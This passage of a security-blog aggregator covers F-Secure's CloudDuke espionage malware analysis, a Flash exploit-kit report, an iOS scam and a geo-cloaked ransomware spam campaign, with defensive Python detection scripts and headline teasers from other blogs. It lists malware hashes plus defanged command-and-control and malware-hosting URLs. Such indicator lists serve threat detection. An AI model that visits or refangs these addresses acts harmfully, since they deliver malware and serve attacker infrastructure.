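        fields = line.split()
        if len(fields) != 5:
            continue                         # skip malformed lines
        date, client, host, method, bytes_out = fields
        if host not in CLOUD_STORAGE_HOSTS or method not in UPLOAD_METHODS:
            continue
        totals[client][date] += int(bytes_out)
    return totals


def find_upload_anomalies(totals: Dict[str, Dict[str, int]], day: str,
                          ratio: float = 10.0, min_bytes: int = 10_000_000) -> List[Finding]:
    """Flag clients whose upload volume on `day` is out of line with their own history.

    A client is flagged only when the day's volume is at least `min_bytes` AND
    either exceeds `ratio` times its median daily volume on earlier days, or the
    client has no earlier cloud-storage uploads at all ("first-seen"). Requiring
    both keeps a user who routinely syncs large files from tripping the rule.
    """
    findings: List[Finding] = []
    for client, by_day in totals.items():
        today = by_day.get(day, 0)
        if today < min_bytes:
            continue
        history = [b for d, b in by_day.items() if d < day]   # ISO dates sort as strings
        if not history:
            findings.append((client, "first-seen", today))
        elif today > ratio * median(history):
            findings.append((client, "spike", today))
    return findings


if __name__ == "__main__":
    totals = daily_cloud_uploads(CONSTRUCTED_LOG)
    for client, reason, volume in find_upload_anomalies(totals, "2015-07-16"):
        print(f"{client}: {reason}, {volume} bytes to cloud storage")
```

Two caveats a practitioner will hit immediately. With TLS the proxy sees only the hostname and byte counts, so this is all the visibility there is without interception, and volume alone does not catch the command-polling side of a tool like OneDriveSolution, whose reads are small; pair the rule with "first use of this service from this host" and with account-level signals where the service offers them.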

Directing limited resources towards evading detection and staying ahead of defenders

Developing even a single multipurpose malware toolset, never mind many, requires time and resources. Therefore it seems logical to reuse code, such as supporting frameworks, between different toolsets. The Duke group, however, appear to have taken this a step further with SeaDuke and the CloudDuke component BastionSolution by rewriting the same code in multiple programming languages. This saves time and resources while providing two malware toolsets that, while similar on the inside, appear completely different on the outside. This way, the discovery of one toolset does not immediately lead to the discovery of the second.

The Duke group, long suspected of ties to the Russian state, have been running their espionage operation for an unusually long time and - especially lately - with unusual brazenness. These latest CloudDuke and SeaDuke campaigns appear to be a clear sign that the Dukes are not planning to stop any time soon.

Research and post by Artturi (@lehtior2)

F-Secure detects CloudDuke as Trojan:W32/CloudDuke.B and Trojan:W64/CloudDuke.B

Samples:

04299c0b549d4a46154e0a754dda2bc9e43dff76
2f53bfcd2016d506674d0a05852318f9e8188ee1
317bde14307d8777d613280546f47dd0ce54f95b
476099ea132bf16fa96a5f618cb44f87446e3b02
4800d67ea326e6d037198abd3d95f4ed59449313
52d44e936388b77a0afdb21b099cf83ed6cbaa6f
6a3c2ad9919ad09ef6cdffc80940286814a0aa2c
78fbdfa6ba2b1e3c8537be48d9efc0c47f417f3c
9f5b46ee0591d3f942ccaa9c950a8bff94aa7a0f
bfe26837da22f21451f0416aa9d241f98ff1c0f8
c16529dbc2987be3ac628b9b413106e5749999ed
cc15924d37e36060faa405e5fa8f6ca15a3cace2
dea6e89e36cf5a4a216e324983cc0b8f6c58eaa8
e33e6346da14931735e73f544949a57377c6b4a0
ed0cf362c0a9de96ce49c841aa55997b4777b326
f54f4e46f5f933a96650ca5123a4c41e115a9f61
f97c5e8d018207b1d546501fe2036adfbf774cfd

Compromised servers used for command and control:

hxxps://cognimuse.cs.ntua.gr/search.php
hxxps://portal.sbn.co.th/rss.php
hxxps://97.75.120.45/news/archive.php
hxxps://58.80.109.59/plugins/search.php

Compromised websites used to host CloudDuke:

hxxp://flockfilmseries.com/eFax/incoming/5442.ZIP
hxxp://www.recordsmanagementservices.com/eFax/incoming/150721/5442.ZIP
hxxp://files.counseling.org/eFax/incoming/150721/5442.ZIP




On 22/07/15 At 11:59 AM

Read More
'Zero Days', The Documentary

Posted by Mikko @ 12:40 GMT


VPRO (the Dutch public broadcasting organization) produced a 45-minute documentary about hacking and the trade of zero days. The documentary has now been released in English on YouTube.



The documentary features Charlie Miller, Joshua Corman, Katie Moussouris, Ronald Prins, Dan Tentler, Eric Rabe (of Hacking Team), Felix Lindner, Rodrigo Branco, Ben Nagy, The Grugq, and many others.




On 20/07/15 At 12:40 PM

Read More
IOS Crash Report: Blocking "Pop-Ups" Doesn't Really Help

Posted by Sean @ 10:15 GMT


The Telegraph published an article on Thursday about a scam targeting iOS users. Here's the gist: scammers are using JavaScript generated dialogs to display warnings of so-called "IOS Crash" reports prompting people to call for tech support. Near the end of the Telegraph's article, the following advice is offered:

"To prevent the issue happening again, go to Settings -> Safari -> Block Pop-ups."

Unfortunately, this advice is incorrect. And perhaps even more unfortunately, some security and tech pundits are now repeating the bad advice on numerous websites. How do we know the advice is wrong? Because we actually tested it…

First of all, this "IOS Crash Report" scam is a variation of the technical support scam, cases of which have been documented as early as 2008. In the past, cold-calls originated directly from call centers in India. But more recently, web-based lures are used to prompt potential victims into contacting the scammers.

A Google Search returns several live scam sites with this text:

"Due to a third party application in your phone, IOS is crashed."

Here's one of the sites as viewed with iOS Safari on an iPad:

iosclean.com

Safari's "Fraudulent Website Warning" and "Block Pop-ups" features didn't prevent the page from loading.

What looks like a pop-up on the image above is actually a JavaScript generated dialog. One which will continuously re-spawn itself and can be very difficult to dismiss. Turning off JavaScript in Safari is the quickest way to regain control. Unfortunately, leaving JavaScript disabled will significantly impact a large number of legitimate websites.

Here's the same site as viewed with Google Chrome for Windows:

Prevent this page from creating additional dialogs

Notice the additional text in the image above: prevent this page from creating additional dialogs. Current versions of Chrome and Firefox (for Windows, at least) will inject this option into re-spawning dialogs, allowing the user to break the loop. Sadly, Internet Explorer and Safari do not. (We tested with IE for Windows / Windows Phone, and iOS Safari.)

Wouldn't it be great if all browsers supported this prevention feature?

Yeah, we think so, too.

But it's not just browsers, apps with browser functionality can also be affected.

Here's an example of a JavaScript dialog displayed via Cydia.

error1014.com

The end of the Telegraph's article included the following advice from City of London police:

"Never give your iCloud username and password or your bank details to someone over the phone."

Indeed! Giving somebody your iCloud password could quickly turn a support scam into a data hijacking and extortion scheme. We attempted to call several of the scammer telephone numbers to see if they would ask for our iCloud credentials — only to discover that the numbers we tried are currently not in service.

Hopefully they stay that way. (They won't.)




On 17/07/15 At 10:15 AM

Read More
Hacking Team 0-day Flash Wave with Exploit Kits

Posted by Patricia @ 12:29 GMT


After Hacking Team was compromised, a lot of information was publicly disclosed beginning on the 5th of July, in particular its list of business clients and a zero-day vulnerability in Adobe Flash Player that the company had been using.

Since the info about the first zero-day was made freely available, we knew attackers would swiftly move to using it. As expected, the Flash exploit was integrated into exploit kits such as Angler, Magnitude, Nuclear, Neutrino, Rig, and HanJuan, as reported by Kafeine.

Based on our telemetry, there was a rise in Flash exploit hits beginning on the 6th that continued until the 9th.

overall_stats (11k image)


Here are the stats for each exploit kit:

ek_stats (27k image)


The security advisory for the CVE-2015-5119 zero-day was released on 7th July and the patch was made available on the 8th, so the hits started to decline about two days after the patch.

But just when people had started updating their systems, there was yet another spike in Angler Flash exploit hits:

weekend_wave_stats (22k image)


Apparently, two more Flash vulnerabilities, CVE-2015-5122 and CVE-2015-5123, were discovered. These vulnerabilities are still waiting to be patched. According to Kafeine, one of the two vulnerabilities was added to the Angler exploit kit.

As a side note related to Angler exploit kit, if you noticed in the second chart above, Angler and HanJuan share the same statistics. This was due to the fact that our detections for Angler Flash exploits were also hitting on HanJuan Flash exploits.

We verified this after noticing that our Angler detection was also matching a different URL pattern, the one used by HanJuan:

angler_vs_hanjuan_urlpattern (9k image)


We looked at the flash exploit used by both kits, and the two are very much identical.

Angler Flash Exploit:

anglerek_ht0d_3 (26k image)


HanJuan Flash Exploit:

hanjuanek_ht0d_3 (23k image)


There was already speculation that there are strong connections between the actors behind the two exploit kits. For example, both have used "fileless" delivery of the payload and even similar encryption methods. Perhaps at some point we will see HanJuan supporting this new Flash 0-day as well.

In the meantime, since there hasn't been a patch for these new ones yet, our users remain protected from the effects of the exploit kits through Browsing Protection as well as these detections:

Exploit:SWF/AnglerEK.L
Exploit:SWF/NeutrinoEK.C
Exploit:SWF/NeutrinoEK.D
Exploit:SWF/NuclearEK.H
Exploit:SWF/NuclearEK.J
Exploit:SWF/Salama.H
Exploit:SWF/Salama.R
Exploit:JS/AnglerEK.D
Exploit:JS/NuclearEK.I
Exploit:JS/MagnitudeEK.A

UPDATE: Adobe has released patches for the recent two vulnerabilities: CVE-2015-5122 and CVE-2015-5123. Users are recommended to update to the latest version of Adobe Flash Player.






On 13/07/15 At 12:29 PM

Read More
The Trusted Internet: Who governs who gets to buy spyware from surveillance software companies?

Posted by FSLabs @ 02:31 GMT


When hackers get hacked, that's when secrets are uncovered. On July 5th, Italian-based surveillance technology company Hacking Team was hacked. The hackers released a 400GB torrent file with internal documents, source code, and emails to the public - including the company's client list of close to 60 customers.

The list included countries such as Sudan, Kazakhstan and Saudi Arabia - despite official company denials of doing business with oppressive regimes. The leaked documents strongly implied that in the South-East Asian region, government agencies from Singapore, Thailand and Malaysia had purchased their most advanced spyware, referred to as a Remote Control System (RCS).

According to security researchers Citizen Lab, this spyware is extraordinarily intrusive, with the ability to turn on microphone and cameras on mobile devices, intercept Skype and instant messages, and use an anonymizer network of proxy servers to prevent harvested information from being traced back to the command and control servers.

Based on images of the client list posted to pastebin the software was purchased in Malaysia by the Malaysia Anti-Corruption Commission (MACC), Malaysia Intelligence (MI) and the Prime Minister's Office (PMO):

hacking_team_client_list (86k image)

Additional images of leaked invoices posted to medium.com indicated the spyware was sold through a locally-based Malaysian company named Miliserv Technologies (M) Sdb Bhd (registered with the Ministry of Finance Malaysia), which specializes in providing digital forensics, intelligence gathering and public security services:

hacking_team_hack_1 (95k image)

hacking_team_hack_2 (72k image)

Why the Prime Minister's Office would need surveillance software remains puzzling. Mind you, professional grade spyware ain't cheap - a license upgrade could cost you MYR400,000 and a maintenance renewal will set you back about MYR160,000.

According to reports of the incident in Malaysian alternative media, Malaysian government agencies have probably been using the spyware even before discovery of the FinFisher malware that was detected in the run-up to the 2013 General Elections.

Coincidentally, Malaysia has also been the frequent host of the annual ISS World Asia tradeshow, where companies promote their arsenal of 'lawful' surveillance software to law enforcement agencies, telco service provider or government employees. During the 2014 event, the Hacking Team was present and the associate lead sponsor of the event.

MiliServ Technologies is currently involved in the upcoming 2015 ISS World Asia in Kuala Lumpur. The event is invitation-only, though it may be interesting to see if Hacking Team will make it there this year.


Post by – Su Gim




On 08/07/15 At 02:31 AM

Read More
Problematic Wassenaar Definitions

Posted by Sean @ 13:25 GMT


The Wassenaar Arrangement, a multilateral export control regime, defines "intrusion software" as software specially designed or modified to avoid detection by monitoring tools, or to defeat protective countermeasures, of a computer or network capable device. Intrusion software is used to: extract data or information, or to modify system or user data; or to modify the standard execution path of a program or process in order to allow the execution of externally provided instructions.

Wassenaar states that monitoring tools are software or hardware devices that monitor system behaviours or processes running on a device. This includes antivirus (AV) products, end point security products, Personal Security Products (PSP), Intrusion Detection Systems (IDS), Intrusion Prevention Systems (IPS) or firewalls.

Wassenaar Arrangement definitions
(Source)


So… what we at F-Secure (and the rest of the antivirus industry) call "malware" appears to easily fit Wassenaar's definition of intrusion software.

Why is this interesting?

Well, the US Bureau of Industry and Security (BIS), part of the US Department of Commerce, has proposed updating its rules to require a license for the export of intrusion software.

And according to the Dept of Commerce, "an export" is –any– item that is sent from the United States to a foreign destination. "Items" include among other things, software and technology.

The Paradox

So… if malware is intrusion software, and any item is an export, how exactly are US-based customers supposed to submit a malware sample to their European antivirus vendor? Seriously, customers send us malware that uses zero-days all the time. Not to mention the samples that we routinely exchange with other trusted AV vendors from around the globe.

Unintended Consequences

The text associated with the BIS proposal says the scope includes penetration testing products that use intrusion software in what looks like an attempt to limit "hacking" tools, but there is nothing about what is excluded from the scope. So the BIS might not intend to limit customers from uploading malware samples to their AV vendor, but that could be the effect if this new rule is adopted and arbitrarily enforced. Or else it could just force people to operate in a legal limbo. Is that what we want?

The BIS is taking comments until July 20th.




On 09/06/15 At 01:25 PM

Read More
Found Item: UK Wi-Fi Law?

Posted by Sean @ 13:27 GMT


I visited the UK last Thursday, found a coffee shop offering "free" Wi-Fi, and read this…

"UK Law states that we must know who is using our Wi-Fi at all times."

Now I'm not a lawyer — but that seems like quite the disingenuous claim.

_WalkinWiFi

Mobile number, post code, and date of birth??

I wonder how many people fall for this type of malarkey.

Post by — @Sean




On 08/06/15 At 01:27 PM

Read More
SMS Exploit Messages

Posted by Sean @ 13:56 GMT


There's an iOS vulnerability affecting iPhone, iPad, and even Apple Watch that allows for a denial of service.

Crashing a phone with an SMS? That's so 2008.


S60 SMS Exploit Messages

Unlike 2008, this time kids are reportedly using the vulnerability to harass others.

Apple is working on a security update. But unfortunately… that update very likely won't be available for older iPhones.

Updated to add:

Here's the "Effective Power" exploit crashing an iPhone 6:


Effective Power Unicode iOS hack on iPhone 6

And this… is Effective Power crashing the iOS Twitter app:


Effective Power Unicode iOS hack vs Twitter




On 28/05/15 At 01:56 PM

Read More
Ransomware Spam E-Mails Targeting Users in Italy and Spain

Posted by FSLabs @ 03:17 GMT


In the past few days, we received some cases from our customers in Italy and Spain, regarding malicious spam e-mails that pointed to Cryptowall or Cryptolocker ransomware.

The spam e-mails pretended to come from a courier/postal service, regarding a parcel that was waiting to be collected. The e-mails offer a link to track that parcel online:

crypt_email (104k image)

When we did the initial investigation of the e-mails from our standard test system, the link redirected to Google:

crypt_email_redirect_italy (187k image)

So, no malicious behavior? Well, we noted that the first two URLs were PHP. Since PHP code is executed on the server side, not locally on the client, it is possible that the servers were 'deciding' whether to redirect the user to Google or to serve malicious content, based on some preset conditions.

Since this particular spam e-mail is written in Italian - perhaps only a customer based in Italy would be able to see the malicious payload? Fortunately, we have Freedome, so we can travel to Italy for a little while to experiment.

So we turned on Freedome, set the location to Milan and clicked the link in the e-mail again:

crypt_email_mal_italy (302k image)

Now we see the bad stuff. If the user is (or appears to be) located in Italy, the server will redirect them to a malicious file hosted on a cloud storage server.

The e-mail spam sent to Spanish users is similar, though in those cases, a CAPTCHA challenge is included to make the site seem more authentic. If the link in the e-mail is clicked by a user located outside Spain, again we end up in Google:

crypt_email_redirect_spain (74k image)

If the site is visited instead from a Spanish IP, we get to the CAPTCHA screen:

crypt_email_target_spain (57k image)

And then to the malware itself:

crypt_email_mal_spain (313k image)

This spam campaign doesn't use any exploits (so far), just old-fashioned social engineering; infection only occurs if the user manually downloads and executes the files offered on the malicious URLs. For our customers, the URLs are blocked and the files are detected.
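The vantage-point comparison this analysis performs by hand (one click from the lab, one through Freedome set to Milan) can be scripted so that a link is checked from two locations and the divergence is reported automatically. This is an added example, not F-Secure's tooling: `redirect_chain` records each HTTP hop without following into the final page, and `compare_chains` reports the first hop where two runs differ. The `proxy` argument is an assumption (an HTTP proxy whose exit is in the country under test; a VPN changes the machine's own exit instead and needs no argument), and the URLs in the test and usage line are placeholders, not the campaign's.

```python
import urllib.error
import urllib.request
from typing import List, Optional, Tuple
from urllib.parse import urljoin

REDIRECT_CODES = {301, 302, 303, 307, 308}


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Stop urllib from following redirects so that each hop can be recorded."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def redirect_chain(url: str, proxy: Optional[str] = None,
                   max_hops: int = 10, timeout: int = 15) -> List[str]:
    """Fetch `url` and return the list of URLs visited, first to last.

    `proxy` is an assumed "http://host:port" whose exit sits in the country
    under test. The loop stops at the first non-redirect response; the body of
    that final response is never read or saved, the hop list is the result.
    """
    handlers: list = [_NoRedirect()]
    if proxy:
        handlers.append(urllib.request.ProxyHandler({"http": proxy, "https": proxy}))
    opener = urllib.request.build_opener(*handlers)
    chain = [url]
    for _ in range(max_hops):
        req = urllib.request.Request(chain[-1], headers={"User-Agent": "Mozilla/5.0"})
        try:
            with opener.open(req, timeout=timeout):
                return chain                    # 2xx: final destination reached
        except urllib.error.HTTPError as err:
            location = err.headers.get("Location")
            if err.code in REDIRECT_CODES and location:
                chain.append(urljoin(chain[-1], location))
                continue
            return chain                        # 4xx/5xx: stop, report what we saw
    return chain                                # too many hops: likely a loop


Divergence = Tuple[int, Optional[str], Optional[str]]


def compare_chains(a: List[str], b: List[str]) -> Optional[Divergence]:
    """None if both vantage points saw the same chain, else (hop index, a's URL,
    b's URL) at the first differing hop; None on one side if that chain ended."""
    for i in range(max(len(a), len(b))):
        x = a[i] if i < len(a) else None
        y = b[i] if i < len(b) else None
        if x != y:
            return i, x, y
    return None


if __name__ == "__main__":
    import sys
    link = sys.argv[1]                                   # e.g. the tracking link from the e-mail
    proxy = sys.argv[2] if len(sys.argv) > 2 else None   # e.g. http://127.0.0.1:8080 (assumed)
    home = redirect_chain(link)
    abroad = redirect_chain(link, proxy=proxy)
    print("home:  ", " -> ".join(home))
    print("abroad:", " -> ".join(abroad))
    print("divergence:", compare_chains(home, abroad))
```

A chain that ends at Google from one exit and at a cloud-storage download from the other is the geo-cloaking described above. Server-side gates can also key on `Accept-Language` or the User-Agent rather than the source IP, so when two exits agree, vary those headers next before concluding the link is clean.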

(malware SHA1s: 483be8273333c83d904bfa30165ef396fde99bf2, 295042c167b278733b10b8f7ba1cb939bff3cb38)

Post by — Victor




On 19/05/15 At 03:17 AM

Read More
Mac Hack Demonstration

Posted by Sean @ 12:46 GMT


Securing your SSH password is very important. Otherwise, you might be pwned by a little girl with her Raspberry Pi.

Kids hack their Dad's computer on her Raspberry Pi

Don't worry, it's an authorized hack, she asked her mom for permission.




On 15/05/15 At 12:46 PM

Read More
Email Security Considerations for Microsoft 365 Users

The post Email Security Considerations for Microsoft 365 Users appeared first on GreatHorn.

Read More
Email Security Considerations for Google Workspace Users

The post Email Security Considerations for Google Workspace Users appeared first on GreatHorn.

Read More
Show the Value of Your Email Security Solutions: Don’t Just Measure Detection Rates

The post Show the Value of Your Email Security Solutions: Don’t Just Measure Detection Rates appeared first on GreatHorn.

Read More
Universities and Colleges Face Multi-faceted Email Security Challenges

The post Universities and Colleges Face Multi-faceted Email Security Challenges appeared first on GreatHorn.

Read More
Spam vs Phish: The Problem with User-Reported Phish Buttons

The post Spam vs Phish: The Problem with User-Reported Phish Buttons appeared first on GreatHorn.

Read More
Phishing for Google Impersonation Attacks

Bad actors around the globe go phishing in emails twenty-four hours a day, seven days a week. Whether they are “guppies” like your local bakery down the street or big “fish” like Google, no one is immune to their attacks. Google, one of the largest, most well-known – and used – applications, will always be […]

The post Phishing for Google Impersonation Attacks appeared first on GreatHorn.

Read More
GMX.Net Phishing Campaigns: Why They’re Hitting Users’ Inboxes

GMX (Global Mail eXchange) Mail is an email service where users may register up to 10 individual email addresses at no cost. As a result, threat actors are leveraging this service to easily spin up new email addresses and effectively delivering phishing attacks that bypass Microsoft o365 and Google Workspace, landing in an organization’s email […]

The post GMX.Net Phishing Campaigns: Why They’re Hitting Users’ Inboxes appeared first on GreatHorn.

Read More
Native vs SEG vs ICES: What You Need to Know About Email Security

The shift from on-premise email platforms to cloud email platforms has taken shape, with the majority (70%) of organizations. Microsoft 365 and Google Workspace remain the predominant email platforms for organizations. However, a significant change has occurred in the past year. With an estimated 40% of ransomware attacks that start through email, and BEC and […]

The post Native vs SEG vs ICES: What You Need to Know About Email Security appeared first on GreatHorn.

Read More
Blueberry Muffins vs Blonde Chihuahuas: Debunking Artificial Intelligence in Email Security

In cybersecurity, buzzwords come and go, often being replaced with new buzzwords while the market is still attempting to realize the benefits of the former. Today, every technology vendor is talking about Artificial Intelligence (AI). In reality, Machine Learning (the method to one day achieve AI) is still the predominant technical solution deployed within vendor […]

The post Blueberry Muffins vs Blonde Chihuahuas: Debunking Artificial Intelligence in Email Security appeared first on GreatHorn.

Read More
Global Supply Chain: Attackers Targeting Business Deliveries

Our global supply chain includes all the people, companies and countries that need to work cohesively to manufacture, process and ship goods. Disruptions in the global supply chain are increasingly impacting organizations, with logistical problems crossing most industries.  As a result, the continued strain on the supply chain puts added pressure on businesses as they […]

The post Global Supply Chain: Attackers Targeting Business Deliveries appeared first on GreatHorn.

Read More
Best Automated Patch Management Software in 2025

Did you know? — Recent research shows that 80% of cyberattacks happen due to unpatched software vulnerabilities. This highlights the critical role of automated patch management software in safeguarding systems. These tools not only streamline updates but also fortify your systems against evolving cyber threats. In this article, we’ll talk about the best automated patch […]

The post Best Automated Patch Management Software in 2025 appeared first on Heimdal Security Blog.

Read More
Heimdal and Interbel Partner to Secure Spanish Businesses Against Rising Cyber Threats

BARCELONA, Spain, and COPENHAGEN, Denmark, January 20, 2025 — Heimdal, a leading cybersecurity company, has partnered with Interbel, a Spanish cybersecurity and Email value added distributor with over 27 years of experience. Together, they will deliver powerful and user-friendly cybersecurity solutions to businesses across Spain, addressing the rising challenges of sophisticated cyber threats and complex […]

The post Heimdal and Interbel Partner to Secure Spanish Businesses Against Rising Cyber Threats appeared first on Heimdal Security Blog.

How to Prepare for NIS2 Audits – A Compliance Expert’s View

Third-party security questionnaires and the number of audits that are growing every year are killing everybody’s soul! – Larisa Mihai, Cyber Compliance Expert In October 2024, European Union member states had a deadline to transpose the NIS2 Directive into national law. Although not all countries have begun enforcing the rules, it will eventually become the […]

The post How to Prepare for NIS2 Audits – A Compliance Expert’s View appeared first on Heimdal Security Blog.

Best 8 Endpoint Protection Software

Endpoint protection software works like a security system for a digital hotel. They equip each ‘room’ – in our case work device – with a lock, alarms, video surveillance, etc. This way they make sure each visitor or hotel employee uses the private or common spaces safely and legit. Endpoint protection tools act like digital […]

The post Best 8 Endpoint Protection Software appeared first on Heimdal Security Blog.

How to Negotiate Your NIS2 Fine or Completely Avoid the Risk

In the next few years, a growing number of organizations across Europe will face investigations for non-compliance with the NIS2 Directive. If they are found to have poor cybersecurity practices, they may well be forced to pay multi-million Euro fines and other penalties. The best way to manage the risk of NIS2 penalties is, of […]

The post How to Negotiate Your NIS2 Fine or Completely Avoid the Risk appeared first on Heimdal Security Blog.

NIS2 Compliance Checklist

The NIS2 Compliance Directive is a pivotal regulation aimed at enhancing cybersecurity within critical sectors across the European Union. With its stringent requirements for managing cyber risks, securing supply chains, and reporting incidents, it’s essential for organizations to ensure compliance. This article outlines the crucial steps for aligning with NIS2 standards, drawn from our comprehensive […]

The post NIS2 Compliance Checklist appeared first on Heimdal Security Blog.

Heimdal and Watsoft Team Up to Strengthen MSP Cybersecurity in France

COPENHAGEN, Denmark, and PARIS, France, January 13, 2025 — Heimdal, a top European cybersecurity company, is teaming up with Watsoft, a French IT distributor focused on Managed Service Providers (MSPs). This partnership will help MSPs in France deal with today’s growing cybersecurity challenges by simplifying how they manage security and offering reliable tools from a […]

The post Heimdal and Watsoft Team Up to Strengthen MSP Cybersecurity in France appeared first on Heimdal Security Blog.

Best 10 Unified Endpoint Management Software

Managing laptops, smartphones, and IoT devices is no easy task – especially with remote work on the rise. The best Unified Endpoint Management (UEM) software turns chaos into control. By bringing endpoint management into a single platform, UEM simplifies IT operations, boosts security, and keeps devices up to date effortlessly. Whether you’re dealing with device sprawl […]

The post Best 10 Unified Endpoint Management Software appeared first on Heimdal Security Blog.

Top 10 Managed Service Providers in New York for 2025

Managed Service Providers (MSPs) play a pivotal role in supporting businesses by managing their IT needs. This article will shine a spotlight on the top Managed Service Providers in New York, those that offer exceptional services and stand out from their peers. Our selection is based on a mix of client reviews, range […]

The post Top 10 Managed Service Providers in New York for 2025 appeared first on Heimdal Security Blog.

NIS2 Compliance – How to Do It Sustainably by Continuous Compliance

Two weeks. That’s how long your organization will have to prepare if you face a NIS2 compliance audit. In those two weeks (just 10 working days), you’ll need to collate a huge amount of evidence to show you’re meeting minimum security standards. We’re talking about risk assessment records, an overview of all your security measures, […]

The post NIS2 Compliance – How to Do It Sustainably by Continuous Compliance appeared first on Heimdal Security Blog.

Top 10 Managed Service Providers in Florida for 2025

In Florida, a state known for its dynamic business landscape as much as its unpredictable weather, selecting from the top Managed Service Providers (MSPs) is essential for companies looking to thrive.  These MSPs not only provide crucial IT support but also tailor their services to adapt to the fast-paced and ever-evolving market demands of the […]

The post Top 10 Managed Service Providers in Florida for 2025 appeared first on Heimdal Security Blog.

How Do Hackers Exploit Your Vulnerabilities?

At the time of writing, there are hundreds of thousands of publicly known vulnerabilities. These range from critical flaws that could cause irreparable damage if exploited to low-severity issues that might seem barely even worth bothering with. With vulnerability management, the challenge is knowing which is which.  With so many vulnerabilities across operating systems, networks, software, […]

The post How Do Hackers Exploit Your Vulnerabilities? appeared first on Heimdal Security Blog.

How to Defend Against the Three Most Dangerous Cybersecurity Attacks

There are a lot of different hacking techniques to be aware of. At the time of publication, the MITRE ATT&CK framework identified some 236 hacking techniques across 14 different categories. Luckily, you don’t need to understand all these tactics to stay safe. Many are close variations of the same basic approach. The best cybersecurity tools […]

The post How to Defend Against the Three Most Dangerous Cybersecurity Attacks appeared first on Heimdal Security Blog.

Top 10 Managed Service Providers in New Jersey for 2025

New Jersey, often seen as the corridor between New York and Philadelphia, is not only a strategic location for businesses but also a hub for technology services, including top Managed Service Providers.  Managed Service Providers play a crucial role in empowering businesses by managing their IT needs.  In this article we will highlight the top […]

The post Top 10 Managed Service Providers in New Jersey for 2025 appeared first on Heimdal Security Blog.

The 12 Best Incident Response Software On the Market in 2025

Nowadays, cyber threats are more sophisticated and common than ever.  Companies face significant risks from breaches, ransomware, and other malicious activities, leading to financial loss, reputational damage, and operational disruptions. Strong incident response capabilities are now essential. Investing in top-tier incident response software is crucial. These tools offer comprehensive solutions for efficiently detecting, managing, and […]

The post The 12 Best Incident Response Software On the Market in 2025 appeared first on Heimdal Security Blog.

An unusual "shy z-wasp" phishing, (Mon, Jan 27th)

Threat actors who send out phishing messages have long ago learned that zero-width characters and unrendered HTML entities can be quite useful to them. Inserting a zero-width character into a hyperlink can be used to bypass some URL security checks without any negative impact on the function of the link, while any unrendered entities can be used to break up any suspicious words or sentences that might lead to the message being classified as a potential phishing, without the recipient being aware of their inclusion.

ISC Stormcast For Monday, January 27th, 2025 https://isc.sans.edu/podcastdetail/9296, (Mon, Jan 27th)

No summary available.

[Guest Diary] How Access Brokers Maintain Persistence, (Fri, Jan 24th)

[This is a Guest Diary by Joseph Flint, an ISC intern as part of the SANS.edu BACS [1] program]

ISC Stormcast For Friday, January 24th, 2025 https://isc.sans.edu/podcastdetail/9294, (Fri, Jan 24th)

No summary available.

XSS Attempts via E-Mail, (Thu, Jan 23rd)

One of the hardest applications to create securely is webmail. E-mail is a complex standard, and almost all e-mail sent today uses HTML. Displaying complex HTML received in an e-mail within a web application is dangerous and often leads to XSS vulnerabilities. Typical solutions include the use of iframe sandboxes and HTML sanitizers. But still, XSS vulnerabilities sneak into applications even if they try hard to get it right. One of my "favorite" examples of how subtle mistakes can cause vulnerabilities was a recent Protonmail vulnerability [1]. Even if you are not using webmail to read email, you may still be exploited as some native email clients have allowed HTML content to leak credentials or have been subject to other HTML-related problems, often related to including content from third-party websites dynamically.

ISC Stormcast For Thursday, January 23rd, 2025 https://isc.sans.edu/podcastdetail/9292, (Wed, Jan 22nd)

No summary available.

Catching CARP: Fishing for Firewall States in PFSync Traffic, (Wed, Jan 22nd)

Legend has it that in the Middle Ages, monks raised carp to be as "round" as possible. The reason was that during Lent, one could only eat as much as fit on a plate, and the round shape of a carp gave them the most "fish per plate". But we are not here to exchange recipes. I want to talk about CARP and the network failover feature.

ISC Stormcast For Wednesday, January 22nd, 2025 https://isc.sans.edu/podcastdetail/9290, (Wed, Jan 22nd)

No summary available.

Geolocation and Starlink, (Tue, Jan 21st)

Until now, satellite internet access has been more of a niche solution for internet access. But with the wide availability of Starlink, this is changing. Starlink's performance and price are competitive for many rural users to forgo solutions like cellular or slower DSL speeds if they are available at all.

ISC Stormcast For Tuesday, January 21st, 2025 https://isc.sans.edu/podcastdetail/9288, (Tue, Jan 21st)

No summary available.

Phishing is the Top Security Threat For Smartphone Users

Phishing attacks are the most common security issue for smartphone users, according to a new study by Omdia.

84% of Healthcare Organizations Sustained Cyberattacks Last Year

A new survey by cybersecurity vendor Netwrix found that 84% of healthcare organizations spotted a cyberattack in the past twelve months, with phishing attacks accounting for 63% of these incidents.

4 Ways to Mature Your Human Risk Management Program

Human risk management (HRM) is now the primary approach to addressing the ongoing need for strong security cultures in organizations of all sizes. HRM focuses on more than just security awareness training (SAT) delivered at regular intervals. The goal is a positive security culture through:

Russian Spear-Phishing Campaign Targets WhatsApp Accounts

The Russian threat actor “Star Blizzard” has launched a spear-phishing campaign attempting to compromise WhatsApp accounts, according to researchers at Microsoft. The operation targets individuals who are involved in providing assistance to Ukraine.

Malvertising Campaign Abuses Google Ads to Target Advertisers

Researchers at Malwarebytes are tracking a major malvertising campaign that’s abusing Google Ads to target individuals and businesses interested in advertising.

CyberheistNews Vol 15 #03 Waging War on Explicit Deepfakes. The Real Problem Behind the UK Crackdown.

Threat Actors Abuse Google Translate to Craft Phishing Links

Threat actors are abusing Google Translate’s redirect feature to craft phishing links that appear to belong to Google, according to researchers at Abnormal Security.

Phishing Campaign Attempts to Bypass iOS Protections

An SMS phishing (smishing) campaign is attempting to trick Apple device users into disabling measures designed to protect them against malicious links, BleepingComputer reports.

From Pig Butchering to People Talking

Interpol has recently recommended discontinuing the use of the term "Pig Butchering" in cybercrime discussions, expressing concern that such terminology may discourage victims from reporting incidents due to feelings of shame or embarrassment.

Effective Security Awareness Training Really Does Reduce Data Breaches

Social engineering and phishing are involved in 70% - 90% of data breaches. No other root cause of malicious hacking (e.g., unpatched software and firmware, eavesdropping, cryptography attacks, physical theft, etc.) comes close.

MY TAKE: Here’s why Donald Trump really needs to fully embrace Joe Biden’s cybersecurity EO

As one of his final official acts, President Joe Biden issued a landmark directive, addressing the evolving challenges posed by cyber threats while charting a strategic course toward a more secure digital ecosystem.

Related: How Trump views of AI, (more…)

The post MY TAKE: Here’s why Donald Trump really needs to fully embrace Joe Biden’s cybersecurity EO first appeared on The Last Watchdog.

GUEST ESSAY: President Biden’s cybersecurity executive order is an issue of national security

President Biden’s detailed executive order relating to cybersecurity is great to see.

